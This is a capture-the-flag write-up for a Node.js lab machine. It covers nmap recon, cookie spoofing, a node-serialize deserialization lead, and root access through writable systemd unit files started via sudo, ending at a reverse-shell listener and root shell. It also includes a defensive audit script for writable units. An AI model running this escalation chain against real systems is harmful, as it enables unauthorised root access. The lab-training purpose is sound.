```text
# Nmap 7.91 scan initiated Mon Mar 29 15:50:00 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.45.222
Nmap scan report for 10.10.45.222
Host is up (0.025s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Node.js Express framework
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: VulnNet – Your reliable news source – Try Now!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 29 15:51:26 2021 -- 1 IP address (1 host up) scanned in 85.79 seconds
```
But with this cookie the app doesn't redirect us anywhere when requesting /login.
However, on the home page we can see "Welcome, admin", confirming that the cookie spoofing worked.
Let's request the home page with a malformed cookie; maybe a stack trace will leak the technology in use.
Sending a partially truncated cookie returns an HTTP 500 error and the following stack trace:
```text
SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at Object.exports.unserialize (/home/www/VulnNet-Node/node_modules/node-serialize/lib/serialize.js:62:16)
    at /home/www/VulnNet-Node/server.js:16:24
    at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/home/www/VulnNet-Node/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/home/www/VulnNet-Node/node_modules/express/lib/router/layer.js:95:5)
    at /home/www/VulnNet-Node/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:335:12)
    at next (/home/www/VulnNet-Node/node_modules/express/lib/router/index.js:275:10)
```
This is a helpful full path disclosure, and the trace shows that server.js passes the cookie through node-serialize's unserialize() before any validation.
As serv-manage we can start and stop a systemd timer called vulnnet-auto (and run daemon-reload) as root via sudo, without a password:

```console
$ sudo -l
Matching Defaults entries for serv-manage on vulnnet-node:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User serv-manage may run the following commands on vulnnet-node:
    (root) NOPASSWD: /bin/systemctl start vulnnet-auto.timer
    (root) NOPASSWD: /bin/systemctl stop vulnnet-auto.timer
    (root) NOPASSWD: /bin/systemctl daemon-reload
```
With systemctl status we can find the path of the timer file:

```console
$ systemctl status vulnnet-auto.timer
● vulnnet-auto.timer - Run VulnNet utilities every 30 min
   Loaded: loaded (/etc/systemd/system/vulnnet-auto.timer; disabled; vendor preset: enabled)
   Active: inactive (dead)
  Trigger: n/a
```
The file is writable by our user (group serv-manage has write permission):

```console
$ ls -lh /etc/systemd/system/vulnnet-auto.timer
-rw-rw-r-- 1 root serv-manage 167 Jan 24 16:59 /etc/systemd/system/vulnnet-auto.timer
```
Let's see /etc/systemd/system/vulnnet-auto.timer:

```ini
[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/30
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target
```

The timer triggers vulnnet-job.service at boot (OnBootSec=0min) and then every 30 minutes (OnCalendar=*:0/30).
We can find the service and see that it is writable by our user too:

```console
$ systemctl status vulnnet-job.service
● vulnnet-job.service - Logs system statistics to the systemd journal
   Loaded: loaded (/etc/systemd/system/vulnnet-job.service; disabled; vendor preset: enabled)
   Active: inactive (dead)

$ ls -lh /etc/systemd/system/vulnnet-job.service
-rw-rw-r-- 1 root serv-manage 197 Jan 24 21:40 /etc/systemd/system/vulnnet-job.service
```
Contents of /etc/systemd/system/vulnnet-job.service:

```ini
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/df

[Install]
WantedBy=multi-user.target
```
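The root cause on this side is a chain of two misconfigurations: both unit files are group-writable by serv-manage, and the sudo rule lets that unprivileged user start the timer that runs the service as root. The following POSIX shell audit is an added example, not part of the original writeup: it flags .timer/.service files in a directory that group or other can write, and follows each timer's Unit= line to its target service; the directory argument and the sample unit files in the test are constructed.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): find systemd unit files that
# non-root users could edit, and follow timer -> service links.
# Assumption: units sit directly in $1 (default /etc/systemd/system);
# drop-in directories are not walked.

# True when the group or other write bit is set on the given file.
group_or_other_writable() {
    [ -n "$(find "$1" \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# List .timer and .service files in $1 writable by group or other.
writable_units() {
    dir="${1:-/etc/systemd/system}"
    for f in "$dir"/*.timer "$dir"/*.service; do
        [ -f "$f" ] || continue
        group_or_other_writable "$f" && printf '%s\n' "$f"
    done
    return 0
}

# Print the service a timer triggers: its Unit= value or, as systemd does
# when Unit= is absent, the timer's own name with a .service suffix.
timer_target() {
    unit=$(sed -n 's/^[[:space:]]*Unit=//p' "$1" | head -n 1)
    [ -n "$unit" ] || unit="$(basename "$1" .timer).service"
    printf '%s\n' "$unit"
}

# Report "WRITABLE <file>" for each editable unit, then "TIMER <t> -> <s>"
# for every timer whose target service is editable: whoever may start
# that timer (here via sudo) gets code run as root.
audit_units() {
    dir="${1:-/etc/systemd/system}"
    writable_units "$dir" | while read -r f; do printf 'WRITABLE %s\n' "$f"; done
    for t in "$dir"/*.timer; do
        [ -f "$t" ] || continue
        svc="$dir/$(timer_target "$t")"
        if [ -f "$svc" ] && group_or_other_writable "$svc"; then
            printf 'TIMER %s -> %s\n' "$t" "$svc"
        fi
    done
    return 0
}

audit_units "$@"
```

The fix the audit points at is to make both unit files root-owned with mode 644 and to drop the sudo rule, since any user who can both edit the service and start the timer is effectively root.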
Let's replace the ExecStart command in /etc/systemd/system/vulnnet-job.service with a reverse shell, then start the timer with our sudo rights.

```console
$ pwncat -lvv 7777
INFO: Listening on :::7777 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:7777 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.163.253:40950 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1359): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-node:/# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnnet-node:/# cat /root/root.txt
```